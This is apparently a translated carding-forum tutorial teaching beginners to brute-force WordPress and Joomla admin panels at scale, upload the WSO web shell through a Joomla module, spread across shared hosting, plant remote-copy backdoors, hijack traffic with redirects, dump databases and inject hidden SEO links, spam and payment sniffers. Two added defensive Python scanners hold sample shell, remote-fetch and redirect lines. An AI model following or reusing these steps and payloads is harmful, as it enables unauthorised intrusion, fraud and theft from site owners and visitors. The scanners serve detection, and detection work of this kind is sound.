I had been meaning to write something for the forum for a long time, and the competition finally gave me a reason. With this article I begin a three-part series of tales for complete beginners from the world of shadow Internet marketing. All the information here is in fact fully public (like everything else), only slightly updated and digested as of the publication date. Using it in its raw form will not bring much satisfaction, but it will give a basic result.
My articles contain no "money button", and never will; only general information is given here, for self-development in our strange field. But with a competent approach, let the seeker find his own. The upside of such information is that it never dies.
Since a lot of technical information is offered and I cannot anticipate everything, sudden problems, pitfalls and so on are possible when you implement it. It is better to write such incidents up in the comments, for the benefit of the forum's development, which is what all of this is planned for. In addition, the software provided will certainly make antivirus products nervous, and if you handle it carelessly it will fray your nerves too, and nerve cells do not regenerate. Therefore, please use virtual machines and disposable hosting. Consider yourself warned.
Stock up on tea, because a wall of text is coming. Let's go.
PS: I tried to keep it as simple as possible.
What is a shell?
The first article is devoted to "shells". The topic is not directly related to carding, but as an idea is developed it contributes to it one way or another. If something like this does not belong here and I have misunderstood something, say so in the comments and we will correct it. In any case, specialists in this area are always needed by the market, not to mention the personal benefits. The article is aimed at complete beginners; seasoned hackers can grin and pass by, or help the beginners with competent answers.
So, a shell, in short, is a script uploaded to someone else's site (more precisely, to its server or hosting) that lets you take control of it. The management functions depend mainly on the available rights, the server's capabilities and your imagination. We will talk about the practical application of this venture towards the end.
As many people, so many opinions, so there are many software implementations of shells. Today we will consider only one of them (but one of the most popular): WSO.
You can download it here -
The shell is launched simply by requesting the script with the configured GET parameter (see the address bar and the "www" parameter). It looks something like this (the antivirus is already nervous):
Looking at it, the functionality ranges from a basic file manager, a built-in database editor and an FTP brute-forcer to a self-destruct button and command execution on the server. Enough for our purposes. Some of these functions will be covered in practical use.
Whoever does not like such a shell or finds it unsuitable can, given the desire and the skills, rework or rewrite it. For beginning techies, a recommendation for a source of condensed information on technical web development will be given at the end. In the meantime, we move on.
Where do shells come from?
We will not consider buying a shell; after all, most people reading this text are not here for that, but are still looking, if not for a button, then for a shovel to dig up the dough. We will do everything ourselves. There are many ways to get shells. In fact, this is one of the branches of the art of hacking and penetration, so all methods divide into targeted and mass.
For targeted penetration of a specific object, people mainly use brute force, phishing, access to mail, scanning for vulnerabilities at all levels, and social engineering. For mass access: brute force, botnets, exploitation of ready-made vulnerabilities. But the methods themselves and their variations can be invented until the end of the world (if one is expected).
Targeted penetration of a single object is certainly interesting, but I want everything at once, and more. Therefore, for a first acquaintance, we will mine in quantity. Vulnerabilities we will postpone until later. Here we will work with brute force.
In theory, more than half of all Internet sites are built not from scratch but on ready-made content management systems (CMS, engines). This resource included. You can check which system a site belongs to, and at the same time get acquainted with their variety, for example here - .
Every CMS has an admin panel for convenient management, and that is what we will brute-force here. That is, first we gain access to the panel, and only then, using its capabilities, we upload the shell. It is both longer and shorter than working with vulnerabilities, but it is effective, it lends itself to automation, and, most importantly, it is the usual routine for those who like grinding.
In total, to get shells we need:
A list of domains to brute-force
A base of logins and passwords
Knowledge of the engines, or a working head
An aside for those who know how to dump databases (you can skip this text): to gain access to the admin panel it is enough to reset the administrator's password in the database, or to give your own user the necessary rights, if the database does not let you upload the file directly.
Where to get domain lists?
If you want to select domains on a particular topic or for a specific CMS, it is easier to use the well-known search engines and a parser for them (for example, the same Selka) or to process WHOIS. In our case we will not bother and will just pull a domain base from somewhere. For example:
Use this database only for tests; given its age, it will not do for productive work.
Searching for the admin area
To start brute-forcing admin panels, you first need to find those admin panels for a specific CMS by going through the original list of domains. There are many signs that identify a specific CMS (sometimes down to the version); you can google them for a specific project if you wish. For example, for the most popular ones:
WordPress: site/wp-login.php
Joomla: site/administrator/index.php
Many ready-made brute-force harvesters can already sort domains into admin pages themselves, and so it will be in our case. We will not dwell on this in detail, but for those who plan to write their own brute-forcers, take note.
Logins and passwords
As for logins: login lists can vary greatly depending on the country you work with, so think for yourself. The main ones are admin and administrator.
Passwords are harder. Too many passwords hurt the overall speed, and passwords also depend on the country. The method I use, not only for this task:
Take a login:pass database
Extract the pure passwords from it
Write a simple SQL script to group the passwords and count their occurrences
Take the most used ones
So that the article is useful to everyone, I am posting the passwords obtained this way. The result will be at least somewhat guaranteed. Those who are resourceful will, for example, easily work out the donor's country from this collection.
But for the fastest effect, simply working through the admin-admin pair also does the job.
We begin to brute-force
There are far too many brute-forcers in this area: from combines and tools specialized for a single CMS, to using the same Keeper projects and Kali tools. For review, I am posting the first combine I found in the public domain (it handles the popular WordPress and Joomla). Taken in haste, it may work crookedly and may be reporting found admin panels to someone, but that is not the point: for a general understanding, a product from the public domain will do. Those who have overcome laziness and developed a plan will go off to make their own solutions; here I only aim to arouse the interest of beginners. Download the program here -
General view of the brute-forcer:
The interface is much simpler than Antidetect's: load the database, logins and passwords, set a reasonable number of threads (be careful with the threads). Press start and forget about the existence of this program for about a day.
At the end the program will display the number of admin panels found, the twinned admin panels and the uploaded shells. We will talk about the latter a bit later.
Although the article is about shells, happiness is not in them alone. A successfully cracked admin panel can be useful even without a shell. We will use Netpeak Checker to evaluate our catch. The program is freely available; many know it from the recommendations on sorting out shops at the stages before driving.
Nothing special was caught in the picture, but with a large number of admin panels it is nicer to start with something fatter: high traffic, PR, age, shops.
Uploading the shells
Access to the admin panel may be enough for our tasks, but sometimes you need to "get in deeper". For this, the shell is uploaded to the server. In this method the shell is uploaded through the admin panel, usually through the engine's own modules or plugins. You can upload by hand or automatically (for example, through ZennoPoster). In our case the combine itself tries to upload the shell. But the success rate of an automated method is always lower than manual, so it is better to work by hand with especially fat domains or with a modest brute-force run.
For example, the process of uploading the shell through a module in the latest version of Joomla:
1. Download the module with the shell baked in.
2. Install the module through the panel (the panel is in Russian because I am showing it on a local server):
3. Go to the shell at:
YourSite/modules/mod_jxtc_newspro/helper_res.php?www
For each CMS the method will be different, but the essence is the same everywhere: wherever you can upload something executable, you can upload a shell. As an addition: according to the old database above, some sites had already been processed by others, but the part of the sites that did not yield to auto-upload came to us safe and sound. This is to say that even on the common field you can grab your own.
Working with the shell
To understand the shell's functionality, it is better to touch everything with your own hands. In fact, everything depends on the specific task, and you do not need to know everything. I leave this point to the reader.
At this stage I will dwell on the nuances.
First, let's discuss the propagation of shells. They cannot reproduce without us, but with a certain amount of luck and understanding, from one site with a shell several sites with shells can be made. Hosting providers usually close this opportunity, but in some places it is available without any dancing with a tambourine. So it is worth a try.
Pay attention to these two items in the shell's file manager:
For those unfamiliar with Unix systems: clicking on them takes you up one level. Once you reach the site root, this feature will either be unavailable, or a list of the same user's other sites will open, or, even worse, the whole server:
And having thus gained access to other sites, you can multiply there.
The second point of this part is creating a backdoor. Perhaps the cunning site administrator will somehow decide to remove our shell. But we must be ready for everything. Therefore, while you have access to the file system, do not forget to upload some script to restore access. As an example, copying a file from a remote server using PHP:
<?php copy('
We will not go deeper; those who wish can read further on their own, because problems with permissions and execution options are possible.
A fun farm
Sooner or later shells breed to a state where it is hard to keep track of them by hand alone. To simplify the process, developers came up with various shell managers. I present one of the options here:
The solution is not the most convenient (it runs in PHP, and the functionality is outdated in places), but it is quite enough for familiarization. The usual functionality of such managers is mass validity checking, uploading backdoors, multiplying, downloading files and executing commands. There are options for Windows.
And now we come to the most important part of the article: why is all this needed? Since several more similar articles could be written for each point of application, and even more for variations with specific tasks, here we consider the applications only in general terms, leaving the nuances that deserve attention aside.
Poking around at the level of the site's file system, we can conveniently use the server as our own file storage, host our sites there (the same doorways), confirm ownership of the domain, simply find interesting and valuable files, up to the connection data for payment systems, or pull site dumps. Application depends on imagination.
Having written the following code into the index.php file in the site root:
header('Location: YourSite');
you can drain all the traffic to yourself. Of course, nobody does this in this crude form: at worst they single out mobile devices separately, and ideally they siphon off small fractions with additional identification of the site's core users, so that the setup lasts as long as possible. But the bottom line is that getting traffic opens a new chapter in its monetization, which we can talk about another time.
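The three code-level artefacts the post describes (the GET-parameter-driven shell, the remote-copy backdoor, and the redirect dropped into the root index.php) are exactly what a site owner should be scanning for. The scanner below is an added example, not part of the original post; it runs over a constructed dict of path-to-PHP-source and reports which file matches which indicator. The module path used in the sample is the one the post shows, but the file contents are constructed.

```python
import re
from pathlib import PurePosixPath

# Indicator 1: a redirect placed in the site's root index.php (traffic hijack).
REDIRECT = re.compile(r'header\s*\(\s*[\'"]Location:', re.I)
# Indicator 2: a file-fetching call whose first argument is a remote URL
# (the "copy a file from a remote server" backdoor pattern).
REMOTE_FETCH = re.compile(
    r'\b(copy|file_get_contents|fopen|curl_init)\s*\(\s*[\'"](?:https?|ftp)://', re.I)
# Indicator 3: request input reaching a code/command execution primitive
# (how a shell lets the operator "execute commands on the server").
REQUEST_INPUT = re.compile(r'\$_(GET|POST|REQUEST|COOKIE)\b')
DANGEROUS_CALL = re.compile(
    r'\b(eval|assert|system|exec|shell_exec|passthru|proc_open|popen)\s*\(', re.I)


def scan_php(files):
    """files: {relative_path: php_source}. Returns sorted (path, indicator) pairs."""
    findings = []
    for path, src in files.items():
        p = PurePosixPath(path)
        if p.name == "index.php" and len(p.parts) == 1 and REDIRECT.search(src):
            findings.append((path, "redirect_in_root_index"))
        if REMOTE_FETCH.search(src):
            findings.append((path, "remote_fetch"))
        if REQUEST_INPUT.search(src) and DANGEROUS_CALL.search(src):
            findings.append((path, "request_driven_execution"))
    return sorted(findings)


# Constructed sample tree; the URLs use RFC 5737/2606 documentation ranges and names.
SAMPLE_FILES = {
    "index.php": "<?php header('Location: http://attacker.example/'); exit; ?>",
    "modules/mod_jxtc_newspro/helper_res.php":
        "<?php if (isset($_GET['www'])) { eval(base64_decode($_POST['c'])); } ?>",
    "wp-content/uploads/.cache.php":
        "<?php copy('http://203.0.113.7/s.txt', __DIR__ . '/s.php'); ?>",
    "wp-login.php":
        "<?php require_once __DIR__ . '/config.php'; $action = $_GET['action'] ?? ''; ?>",
}

if __name__ == "__main__":
    for path, indicator in scan_php(SAMPLE_FILES):
        print(f"{indicator:26} {path}")
```

The last sample file reads request input without passing it to an execution primitive and is correctly left unflagged; a real run would walk the document root and feed each .php file's contents in.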
Access to the database
For a site, storing its database access settings in the clear in the site root is a common thing. So, having access to the files, you can access the database. And there, at the very least, you can dump the login-password base.
Proxies on sites are not the best solution, but for the elite it is also possible. One of the programs:
Most likely it is also in the public domain, but just in case I will attach it: VPSProxy. The gate.php file is uploaded to the server; in the program settings we specify the path to the gate, the password and the encryption key. The program starts a server on the local machine, to whose port we connect as a proxy (http - 2222, https - 2223).
SEO links
The eternal source of SEOs' excitement is building up a site's external link mass and the debate about its impact on ranking. A shell does not make it possible to accurately evaluate the search engine's ranking algorithm by the link factor, but it does make it possible to stick a link from fat resources just in case, saving a little. The link is of course visually hidden. Links live happily ever after. Example (generated on a local server):
Pay attention to the text "French cuisine" and the code inspector showing a link to Yandex.
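Because the injected link is "visually hidden", a content check that compares what the browser shows with what the HTML carries will expose it. The finder below is an added example, not part of the original post: it walks a constructed HTML page with the standard-library parser, tracks whether each anchor sits inside an element hidden by inline style or the hidden attribute, and returns only the hidden links.

```python
import re
from html.parser import HTMLParser

# Inline-style tricks commonly used to hide injected links from visitors.
HIDDEN_STYLE = re.compile(
    r'display\s*:\s*none|visibility\s*:\s*hidden|font-size\s*:\s*0(?![.\d])'
    r'|opacity\s*:\s*0(?![.\d])|(?:left|top|text-indent)\s*:\s*-\d{3,}px', re.I)
VOID = {"br", "img", "hr", "meta", "link", "input", "area", "base", "col", "source"}


class HiddenLinkFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.stack = []     # one entry per open element: is it (or an ancestor) hidden?
        self.links = []     # every <a> seen: {"href", "text", "hidden"}
        self._href, self._text = None, []

    def handle_starttag(self, tag, attrs):
        if tag in VOID:
            return                          # void elements never get an end tag
        a = dict(attrs)
        own = "hidden" in a or bool(HIDDEN_STYLE.search(a.get("style") or ""))
        self.stack.append(own or (self.stack[-1] if self.stack else False))
        if tag == "a":
            self._href, self._text = a.get("href", ""), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag in VOID:
            return
        if tag == "a" and self._href is not None:
            self.links.append({"href": self._href, "text": "".join(self._text).strip(),
                               "hidden": bool(self.stack and self.stack[-1])})
            self._href = None
        if self.stack:
            self.stack.pop()


def find_hidden_links(html):
    """Return the anchors that a visitor would not see on the rendered page."""
    p = HiddenLinkFinder()
    p.feed(html)
    p.close()
    return [link for link in p.links if link["hidden"]]


# Constructed sample page mirroring the post's "French cuisine" example.
SAMPLE_HTML = """<html><body><h1>French cuisine</h1>
<p>Visible <a href="https://example.org/recipes">recipe</a> link.<br></p>
<div style="display:none"><a href="https://yandex.ru/">French cuisine</a></div>
<p><span style="font-size:0"><a href="http://203.0.113.7/">cheap</a></span></p>
<p style="position:absolute;left:-9999px"><a href="http://example.net/">off-screen</a></p>
<a href="/contact" hidden>hidden attribute</a></body></html>"""

if __name__ == "__main__":
    for link in find_hidden_links(SAMPLE_HTML):
        print(link["href"], "->", link["text"])
```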
Traffic on a compromised site allows you to place ads: from banal AdSense to underground exchanges of links, teasers, pop-ups and other rubbish. Again, a topic big enough for a couple of such articles. And you can try to hook up the same AdSense; that topic was on the forum.
One could have left a headline like "Spam by e-mail", but the word "relays" just looks prettier. In short, at the basic level, using PHP on the server you can send letters with the function <?php mail(1, 2, 3, 4); ?>. There are programs that automate this activity. In my time AMS Enterprise was the most popular. I did not see a version of it with relays in the public domain, and later I moved to mailing from VPSes with signatures (now I do not spam). But I had to use it, and it works. Now, perhaps, there are working alternatives.
With the shell of an online store, the list of higher-level actions expands to managing order statuses, removing gifts, sniffing and substituting payment systems. About sniffing, by the way, a competition article has already been presented on the forum. Those interested can help themselves:
For those who have found nothing interesting above, and even more so do not want to look for more serious shell-based fraud, shells as a raw material can always be sold to those who do something with them.
That is all, in general. Further searching leads towards working with mass and targeted site vulnerabilities, working with traffic, and botnets; there are enough paths for development for everyone, if there is the desire. In the meantime, this concludes the article.
Edited by Zero00m, 15 October 2019 - 15:09.